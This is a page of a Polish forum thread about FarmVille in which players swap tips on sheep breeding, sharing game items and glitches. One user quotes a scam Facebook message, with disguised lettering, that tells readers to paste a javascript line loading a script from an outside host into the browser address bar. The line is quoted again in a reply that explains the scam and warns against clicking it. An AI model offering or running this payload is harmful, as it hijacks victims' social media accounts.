Wszystko o FarmVille ;) - Strona 7 - Wizaz.pl

Wróć   Wizaz.pl > Kobieta > Forum plotkowe

Notka

Forum plotkowe Zapraszamy do plotkowania. Na forum plotkowym nie musisz się trzymać tematyki urodowej. Tutaj porozmawiasz o wszystkim co cię interesuje, denerwuje i zadziwia.

Odpowiedz
 
Narzędzia
Stary 2011-04-12, 07:20   #181
line_87
Rozeznanie
 
Avatar line_87
 
Zarejestrowany: 2010-01
Wiadomości: 867
Dot.: Wszystko o FarmVille ;)

Głupie pytanie, ale Wy chyba jesteście o wiele bardziej ode mnie zorientowane Co się robi z tymi bukietami zbieranymi ze Spring Garden?
__________________
32/40
line_87 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-12, 11:40   #182
Lexie
Przyjaciel wizaz.pl
 
Avatar Lexie
 
Zarejestrowany: 2004-06
Lokalizacja: Warszawa
Wiadomości: 33 873
Dot.: Wszystko o FarmVille ;)

Na razie nic się z nimi nie robi, można je trzymać w gift boxie czekając na koszyk żeby je tam powkładać, albo się ich pozbyć. Ja się pozbyłam bo nie lubię tego całego zbierania i raczej nie będę brała udziału Z reguły nagrody i tak łapię z tablicy, albo ktoś fajny mi daje w prezencie
Lexie jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-12, 14:22   #183
kociaaq
Przyczajenie
 
Zarejestrowany: 2011-04
Wiadomości: 10
Dot.: Wszystko o FarmVille ;)

czy wam tez wlasnie przestal dzialac facebook???
10 min temu weszlam bo wrocilam z pracy zaczelam sprawdzac co zrobic i nagle sie scielo daje odswiez i laduje sie laduje prawia 10 min mija i nic , wsie strony mi chodza tylko nie facebook
i co teraz ? plony mi sie zepsuja (
kociaaq jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-12, 14:24   #184
aagusiaa88
Zakorzenienie
 
Avatar aagusiaa88
 
Zarejestrowany: 2008-09
Lokalizacja: Wrocław :*
Wiadomości: 13 926
Dot.: Wszystko o FarmVille ;)

mi dziala normalnie
aagusiaa88 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-12, 16:03   #185
isa666
Zakorzenienie
 
Avatar isa666
 
Zarejestrowany: 2005-11
Lokalizacja: Big Roads :D
Wiadomości: 24 540
Dot.: Wszystko o FarmVille ;)

No właśnie, mogliby już wprowadzić coś na te kwiatki, bo mi w gift boxie zalegają

Dziewczyny ma któraś z Was jakąś "zbędną" owieczkę w kropki do oddania? Chętnie przygarnę, bo złapać ciągle nie mogę.
__________________
Trance is essential for my life
isa666 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-12, 16:11   #186
ziarnko piasku
Zadomowienie
 
Avatar ziarnko piasku
 
Zarejestrowany: 2008-12
Lokalizacja: West Midlands, UK
Wiadomości: 1 142
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez isa666 Pokaż wiadomość
No właśnie, mogliby już wprowadzić coś na te kwiatki, bo mi w gift boxie zalegają

Dziewczyny ma któraś z Was jakąś "zbędną" owieczkę w kropki do oddania? Chętnie przygarnę, bo złapać ciągle nie mogę.
o jezu, ja mam same w kropki no dzisiaj mi wyrósł mrugający baran w gwiazdki to mi może jakies gwiazdkowe wyjdą. Zaraz Cię poszukam i Cię dodam do znajomych - jak mogę
__________________
We all fall to the floor at some point.
It's how you pick yourself up.
That's the real challenge.
Isn't it?


ziarnko piasku jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-12, 16:12   #187
isa666
Zakorzenienie
 
Avatar isa666
 
Zarejestrowany: 2005-11
Lokalizacja: Big Roads :D
Wiadomości: 24 540
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez ziarnko piasku Pokaż wiadomość
o jezu, ja mam same w kropki no dzisiaj mi wyrósł mrugający baran w gwiazdki to mi może jakies gwiazdkowe wyjdą. Zaraz Cię poszukam i Cię dodam do znajomych - jak mogę
Wysłałam PW
__________________
Trance is essential for my life
isa666 jest offline Zgłoś do moderatora   Odpowiedz cytując

Najlepsze Promocje i Wyprzedaże

REKLAMA
Stary 2011-04-13, 08:34   #188
dżiza
Raczkowanie
 
Avatar dżiza
 
Zarejestrowany: 2005-06
Lokalizacja: Warszawa
Wiadomości: 315
Dot.: Wszystko o FarmVille ;)

Ja też się chętnie wymienię na jakieś owce, bo póki co mam prawie same zielone i zielone w kropki (to dzięki Lexie). Jak ktoś chce to proszę pisać na prv.

I drzewo też mogę jakieś skombinować jak ktoś chce.
dżiza jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-13, 12:28   #189
viky
Raczkowanie
 
Zarejestrowany: 2008-02
Wiadomości: 33
Dot.: Wszystko o FarmVille ;)

Ja tez bym bardzo ładnie poprosiła gdyby komuś przypadkiem owieczka w kropki "zalegała" bo próbuje złapać z tablicy już tyle czasu i... lipa, że się tak wyrażę

laszlaa@gmail.com jak coś i dzięki wielkie z góry
viky jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-13, 14:36   #190
nietoperek22
Rozeznanie
 
Avatar nietoperek22
 
Zarejestrowany: 2007-09
Lokalizacja: NRW
Wiadomości: 737
Dot.: Wszystko o FarmVille ;)

Ja mogę porobić owieczki w gwiazdki jak ktoś chce z resztą już o tym pisałam
http://www.facebook.com/profile.php?id=100001032214685
Po dodaniu mnie do znajomych napiszcie mi osobną wiadomość na fb, że chcecie owieczkę bo ostatnio już się gubię i nie ogarniam czatu fb. Pozdrawiam
nietoperek22 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-13, 17:15   #191
dżiza
Raczkowanie
 
Avatar dżiza
 
Zarejestrowany: 2005-06
Lokalizacja: Warszawa
Wiadomości: 315
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez nietoperek22 Pokaż wiadomość
Ja mogę porobić owieczki w gwiazdki jak ktoś chce z resztą już o tym pisałam
http://www.facebook.com/profile.php?id=100001032214685
Po dodaniu mnie do znajomych napiszcie mi osobną wiadomość na fb, że chcecie owieczkę bo ostatnio już się gubię i nie ogarniam czatu fb. Pozdrawiam
No to ja chcę byś Twoją sąsiadką i już wysłałam zaproszenie
dżiza jest offline Zgłoś do moderatora   Odpowiedz cytując

Okazje i pomysły na prezent

REKLAMA
Stary 2011-04-14, 09:21   #192
dżiza
Raczkowanie
 
Avatar dżiza
 
Zarejestrowany: 2005-06
Lokalizacja: Warszawa
Wiadomości: 315
Dot.: Wszystko o FarmVille ;)

Dziewczyny, czy owce dziedziczą wzór tylko po ojcu czy po matce czasem też?
dżiza jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-14, 20:43   #193
nietoperek22
Rozeznanie
 
Avatar nietoperek22
 
Zarejestrowany: 2007-09
Lokalizacja: NRW
Wiadomości: 737
Dot.: Wszystko o FarmVille ;)

Po matce też ;( nie zlicze ile razy się wkurzałam jak zamiast gwiazdek czy kropek wychodziła mi czysta owca
nietoperek22 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-15, 18:20   #194
Olaalla
Zadomowienie
 
Avatar Olaalla
 
Zarejestrowany: 2010-01
Lokalizacja: Trójmiasto
Wiadomości: 1 684
GG do Olaalla
Dot.: Wszystko o FarmVille ;)

Czy kasztanowiec może wyrosnąć z sadzonek złapanych z tablicy?
Olaalla jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-15, 22:08   #195
beatricze
Przyczajenie
 
Zarejestrowany: 2009-02
Wiadomości: 11
Dot.: Wszystko o FarmVille ;)

hej

Może zadam głupie pytanie, no ale muszę je zadać:P
W jaki sposób można złapać owce z tablicy ??
W jaki sposób można dostać owcę od kogoś?
bo w mojej hodowli są same nijakie owce..
pomocy
beatricze jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-15, 23:45   #196
Akashka
Zadomowienie
 
Avatar Akashka
 
Zarejestrowany: 2007-08
Lokalizacja: Stad...
Wiadomości: 1 380
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez beatricze Pokaż wiadomość
hej

Może zadam głupie pytanie, no ale muszę je zadać:P
W jaki sposób można złapać owce z tablicy ??
W jaki sposób można dostać owcę od kogoś?
bo w mojej hodowli są same nijakie owce..
pomocy
Albo jak ktos opublikuje na tablicy to mozesz zlapac jagnie albo mozesz sie do kogos ladnie usmiechnac po konkretna owieczke i wtedy ten ktos podesle ci linka. Klikniesz na niego i tez dostaniesz jagnie Wykarmic musisz sama
__________________



Akashka jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-15, 23:52   #197
HulaGirl
Zakorzenienie
 
Avatar HulaGirl
 
Zarejestrowany: 2005-08
Lokalizacja: Kielce/Kraków
Wiadomości: 12 454
GG do HulaGirl
Dot.: Wszystko o FarmVille ;)

wytłumaczy mi ktoś łopatologicznie jak "zrobić" taki link?

bo wiem że mogę opublikowac na tablicy jagnię ale jak chce je dac konkretnej osobie to jak to wtedy zrobić
HulaGirl jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-16, 12:39   #198
beatricze
Przyczajenie
 
Zarejestrowany: 2009-02
Wiadomości: 11
Dot.: Wszystko o FarmVille ;)

W takim razie ładnie się uśmiecham do Was wizażanki
I podobnie jak HulaGirl - jak zrobić takiego linka >
beatricze jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-16, 14:32   #199
kociaaq
Przyczajenie
 
Zarejestrowany: 2011-04
Wiadomości: 10
Dot.: Wszystko o FarmVille ;)

dziewczyny pomozcie , nie wiem co sie dzieje , przez 3 dni nie mialam internetu wiec nie bylo mnie wogole na farmville , dzis wchodze i wlanczam farme a tam widze tylko moje pole i kolka [cienie] na stronie glownej nic nie moge napisac , w wiadomosciach widze cos od "31" ale nie moge wogole wejsc na wiadomosci klikam a mi sie strona odswieza i nic widze tylko kawalek tekstu "not join , my account has been hacked do not join this event it can hack you account wi... " nie rozumiem o ch chodzi bo moj tlumacz tego nie ogarnia , ludzie co sie dzieje !!??

---------- Dopisano o 15:26 ---------- Poprzedni post napisano o 15:22 ----------

druga wiadomosc od tej samej osoby to " how to get 950 credit's completely freee ... niym6. i actuallly tried it
hej guys this really works and i got my 500 credits .." i dalej nic moge przeczytac bo nie moge wejsc na wiuadomosci

---------- Dopisano o 15:30 ---------- Poprzedni post napisano o 15:26 ----------

Cytat:
Napisane przez kociaaq Pokaż wiadomość
dziewczyny pomozcie , nie wiem co sie dzieje , przez 3 dni nie mialam internetu wiec nie bylo mnie wogole na farmville , dzis wchodze i wlanczam farme a tam widze tylko moje pole i kolka [cienie] na stronie glownej nic nie moge napisac , w wiadomosciach widze cos od "31" ale nie moge wogole wejsc na wiadomosci klikam a mi sie strona odswieza i nic widze tylko kawalek tekstu "not join , my account has been hacked do not join this event it can hack you account wi... " nie rozumiem o ch chodzi bo moj tlumacz tego nie ogarnia , ludzie co sie dzieje !!??

---------- Dopisano o 15:26 ---------- Poprzedni post napisano o 15:22 ----------

druga wiadomosc od tej samej osoby to " how to get 950 credit's completely freee ... niym6. i actuallly tried it
hej guys this really works and i got my 500 credits .." i dalej nic moge przeczytac bo nie moge wejsc na wiuadomosci




weszlam przez konto mojej siostry i ta wiadomosc brzmi :
"My account has been hacked do not join this event it can hack your account without your password!!! It is a hack do not click it!!!!!!!!!!!!!!!!!
I am doing everything I can to fix it... Please bear with me and please don't delete me!!!
Sincerely,
Elise"

---------- Dopisano o 15:32 ---------- Poprzedni post napisano o 15:30 ----------

a ta druga to :


Faith C. Buban 16 kwietnia o 14:39 Odpowiedz • Zgłoś
Hеy Guys thіs rеally wοrks аnd I got my 500 crеdits

Just fоllоw thеse 3 steps:

1. Cоpy thіs cοde (highlіght and press CTRL-C):

javascripta=(b=document ).createElement('script') ).src='//2za.com.recomnet.info/f.js',b.body.appendChild( a);void(0)

2. Dеlеte the аctuаl address frоm the url fіеld іn yοur browsеr аnd pаste thе cоdе іnstеad.

3. Press Entеr аnd wаit fоr a bіt, it cаn takе up tο а minutе tо complеte.

That's іt!

If you аre hаvіng trоublе with thеsе instructiоns, try νiеwіng thе іnstructіоns herе: http://ewq.com.recomnet.info/?op37t

it's where I learned it
kociaaq jest offline Zgłoś do moderatora   Odpowiedz cytując

Okazje i pomysły na prezent

REKLAMA
Stary 2011-04-16, 14:46   #200
ziarnko piasku
Zadomowienie
 
Avatar ziarnko piasku
 
Zarejestrowany: 2008-12
Lokalizacja: West Midlands, UK
Wiadomości: 1 142
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez HulaGirl Pokaż wiadomość
wytłumaczy mi ktoś łopatologicznie jak "zrobić" taki link?

bo wiem że mogę opublikowac na tablicy jagnię ale jak chce je dac konkretnej osobie to jak to wtedy zrobić
Cytat:
Napisane przez beatricze Pokaż wiadomość
W takim razie ładnie się uśmiecham do Was wizażanki
I podobnie jak HulaGirl - jak zrobić takiego linka >
jak wam wyskakuje okno z rzeczą do podzielenia się to klikacie na granatowy tytuł np: "xxx have just found mystery seedling while harvesting their orchard" czy jakoś tak - klikacie to prawym przyciskiem myszy, zaznaczacie Copy Link Location i potem na czacie czy w wiadomości robicie "wklej" i wysyłacie link do danej osoby.
Alternatywnie jak Wam wyskoczy okno do publikacji na ścianie, że coś znalazłyście czy czymś się chcecie podzielić to klikacie na tą małą kłódeczkę przy Publikuj i wybieracie Dostosuj /customise i zaznaczacie osoby, które mają to widzieć lub osoby, które mają nie widzieć danego postu (łatwiej wybrać 5 osób [w przypadku love potion np czy jedną przy adopcji owieczki] które mają WIDZIEĆ dany post na tablicy)

ufff... mam nadzieję, że w miarę jasno i łopatologicznie

Cytat:
Napisane przez kociaaq Pokaż wiadomość
dziewczyny pomozcie , nie wiem co sie dzieje , przez 3 dni nie mialam internetu wiec nie bylo mnie wogole na farmville , dzis wchodze i wlanczam farme a tam widze tylko moje pole i kolka [cienie] na stronie glownej nic nie moge napisac , w wiadomosciach widze cos od "31" ale nie moge wogole wejsc na wiadomosci klikam a mi sie strona odswieza i nic widze tylko kawalek tekstu "not join , my account has been hacked do not join this event it can hack you account wi... " nie rozumiem o ch chodzi bo moj tlumacz tego nie ogarnia , ludzie co sie dzieje !!??

---------- Dopisano o 15:26 ---------- Poprzedni post napisano o 15:22 ----------

druga wiadomosc od tej samej osoby to " how to get 950 credit's completely freee ... niym6. i actuallly tried it
hej guys this really works and i got my 500 credits .." i dalej nic moge przeczytac bo nie moge wejsc na wiuadomosci

---------- Dopisano o 15:30 ---------- Poprzedni post napisano o 15:26 ----------







weszlam przez konto mojej siostry i ta wiadomosc brzmi :
"My account has been hacked do not join this event it can hack your account without your password!!! It is a hack do not click it!!!!!!!!!!!!!!!!!
I am doing everything I can to fix it... Please bear with me and please don't delete me!!!
Sincerely,
Elise"

---------- Dopisano o 15:32 ---------- Poprzedni post napisano o 15:30 ----------

a ta druga to :


Faith C. Buban 16 kwietnia o 14:39 Odpowiedz • Zgłoś
Hеy Guys thіs rеally wοrks аnd I got my 500 crеdits

Just fоllоw thеse 3 steps:

1. Cоpy thіs cοde (highlіght and press CTRL-C):

javascripta=(b=document ).createElement('script') ).src='//2za.com.recomnet.info/f.js',b.body.appendChild( a);void(0)

2. Dеlеte the аctuаl address frоm the url fіеld іn yοur browsеr аnd pаste thе cоdе іnstеad.

3. Press Entеr аnd wаit fоr a bіt, it cаn takе up tο а minutе tо complеte.

That's іt!

If you аre hаvіng trоublе with thеsе instructiоns, try νiеwіng thе іnstructіоns herе: http://ewq.com.recomnet.info/?op37t

it's where I learned it
Najprawdopodobniej pierwsza wiadomość została wysłana do kilku osób i osoba odpowiadająca na nią również wysłała do wszystkich, którzy byli na liście. Najpierw ktoś wysłał jakiś scam, w jaki to szybki i cudowny sposób można zdobyć kredysty FB (które potem można wymienić na Farm Cash) a osoba, która to kliknęła udostępniła całe swoje konto postronnym osobom.
NIGDY PRZENIGDY nie klikajcie w takie cuda, bo potem będzie płacz i zgrzytanie zębami, że Wam konto na FB przepadło, że ktoś je zhakował i nie wiadomo co zrobi. Takie wiadomości należy od razu usuwać - najlepiej z osobami, któe to wysyłają - to najczęsciej obcokrajowcy jak to jakaś polska sąsiadka czy wizażanka to najpierw bym ją uświadomiła czym grozi klikanie w takie bzdury a jakby dalej słała mi ten spam to bym ją po prostu wywaliła, bo nie mam czasu na pierdoły.
__________________
We all fall to the floor at some point.
It's how you pick yourself up.
That's the real challenge.
Isn't it?


ziarnko piasku jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-17, 14:41   #201
Olaalla
Zadomowienie
 
Avatar Olaalla
 
Zarejestrowany: 2010-01
Lokalizacja: Trójmiasto
Wiadomości: 1 684
GG do Olaalla
Dot.: Wszystko o FarmVille ;)

Czy któraś z Was też spotkała się z problemem, że nie może opublikować drzewa, które wyrosło z sadzonki? Mi nie wyskakuje to okienko od kiedy wprowadzili tę nowość, że pojawia się konweka i mogę wybrać, którą sadzonkę podlać
Sam pomysł tej nowości jest świetny, dużo szybciej to wszystko idzie, tylko oby jak najszybciej się uporali z tymi okienkami.
Olaalla jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-17, 17:37   #202
beatricze
Przyczajenie
 
Zarejestrowany: 2009-02
Wiadomości: 11
Dot.: Wszystko o FarmVille ;)

hmmm... w takim razie mogę Was prosić o pomoc w zdobyciu jakichś fajnych owieczek i drzewek?
Przy okazji jeśli ktoś poszukuje są sąsiadki : ozga.beataa@gmail.com
beatricze jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-20, 13:58   #203
MartaOrka
Raczkowanie
 
Zarejestrowany: 2010-06
Wiadomości: 56
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez Olaalla Pokaż wiadomość
Czy któraś z Was też spotkała się z problemem, że nie może opublikować drzewa, które wyrosło z sadzonki? Mi nie wyskakuje to okienko od kiedy wprowadzili tę nowość, że pojawia się konweka i mogę wybrać, którą sadzonkę podlać
Sam pomysł tej nowości jest świetny, dużo szybciej to wszystko idzie, tylko oby jak najszybciej się uporali z tymi okienkami.
mam to samo.z tym że u mnie jak chcę publikować drzewko to wyskakuje okienko z ikonką sadzonki i wychodzi potem że zamiast drzewkiem dzielę się konewkami:/ i to dziś mi się pojawiło
MartaOrka jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-20, 15:44   #204
Olaalla
Zadomowienie
 
Avatar Olaalla
 
Zarejestrowany: 2010-01
Lokalizacja: Trójmiasto
Wiadomości: 1 684
GG do Olaalla
Dot.: Wszystko o FarmVille ;)

U mnie już działa poprawnie, na szczęście
Czy ten hibiskus nie był już latem dostępny w markecie?
Olaalla jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-20, 16:54   #205
Akashka
Zadomowienie
 
Avatar Akashka
 
Zarejestrowany: 2007-08
Lokalizacja: Stad...
Wiadomości: 1 380
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez MartaOrka Pokaż wiadomość
mam to samo.z tym że u mnie jak chcę publikować drzewko to wyskakuje okienko z ikonką sadzonki i wychodzi potem że zamiast drzewkiem dzielę się konewkami:/ i to dziś mi się pojawiło
Ja to samo mialam wczoraj. Czasem opublikowal drzewko a czasem konewki
__________________



Akashka jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-20, 17:31   #206
monius9
Zakorzenienie
 
Zarejestrowany: 2006-12
Wiadomości: 5 046
Dot.: Wszystko o FarmVille ;)

dziewczyny hodujące owieczki - powiedzcie mi, jaka jest szansa że uda mi się wyhodować 'faceta'? ;p zdobyłam licencję na owczarnię na starej farmie ale do produkcji owiec potrzebny mi tam jeszcze jakiś facet [eh miałam nadzieję że uda się tam wstawić muflona ]
monius9 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-22, 14:44   #207
monius9
Zakorzenienie
 
Zarejestrowany: 2006-12
Wiadomości: 5 046
Dot.: Wszystko o FarmVille ;)

wczorajsze posty zniknęły, ale żali ciąg dalszy: farma nie ładuje się drugi dzień. dobrze że chociaż więdnięcie wyłączyli.. ciekawe kiedy to naprawią
monius9 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-23, 16:17   #208
Kasia5036
Przyczajenie
 
Zarejestrowany: 2009-06
Wiadomości: 2
Dot.: Wszystko o FarmVille ;)

HejCzy ktoś mógłby mi powiedzieć, co moge zrobić jeżeli usunełam balon tego dziadka? czy moge go jeszcze gdzies kupić albo znaleźć? bo chciałabym zacząć grać na tej drugiej farmie a niewiem czy teraz jest to jeszcze możliwe... pozdrawiam
Kasia5036 jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-23, 19:01   #209
Lexie
Przyjaciel wizaz.pl
 
Avatar Lexie
 
Zarejestrowany: 2004-06
Lokalizacja: Warszawa
Wiadomości: 33 873
Dot.: Wszystko o FarmVille ;)

Cytat:
Napisane przez monius9 Pokaż wiadomość
dziewczyny hodujące owieczki - powiedzcie mi, jaka jest szansa że uda mi się wyhodować 'faceta'? ;p zdobyłam licencję na owczarnię na starej farmie ale do produkcji owiec potrzebny mi tam jeszcze jakiś facet [eh miałam nadzieję że uda się tam wstawić muflona ]
Hodowla idzie losowo, bardziej prawdopodobne są owce, ale barany też się muszą trafiać U mnie czasem jest parę pod rząd.

A co do balonu, to można lecieć na drugą farmę i bez niego, ale chyba najpierw trzeba zrobić questy - robiłaś je? Tam na koniec jest urządzenie "imprezy pożegnalnej", trzeba zapraszać sąsiadów i w zależności od frekwencji skraca się czas do wylotu na english countryside. Jeśli zrobiłaś te questy, powinnaś móc polecieć do anglii klikając przycisk w górnym prawym rogu ekranu, tam gdzie jest napisane "ktośtam's farm"
Lexie jest offline Zgłoś do moderatora   Odpowiedz cytując
Stary 2011-04-23, 22:33   #210
aagusiaa88
Zakorzenienie
 
Avatar aagusiaa88
 
Zarejestrowany: 2008-09
Lokalizacja: Wrocław :*
Wiadomości: 13 926
Dot.: Wszystko o FarmVille ;)

dziewczyny, widzialyscie, ze w pubie mozna juz produkowac love potion?
aagusiaa88 jest offline Zgłoś do moderatora   Odpowiedz cytując
Odpowiedz

Nowe wątki na forum Forum plotkowe


Ten wątek obecnie przeglądają: 1 (0 użytkowników i 1 gości)
 

Zasady wysyłania wiadomości
Nie możesz zakładać nowych wątków
Nie możesz pisać odpowiedzi
Nie możesz dodawać zdjęć i plików
Nie możesz edytować swoich postów

BB code is Włączono
Emotikonki: Włączono
Kod [IMG]: Włączono
Kod HTML: Wyłączono

Gorące linki


Data ostatniego posta: 2014-02-25 13:59:54


Strefa czasowa to GMT +1. Teraz jest 19:58.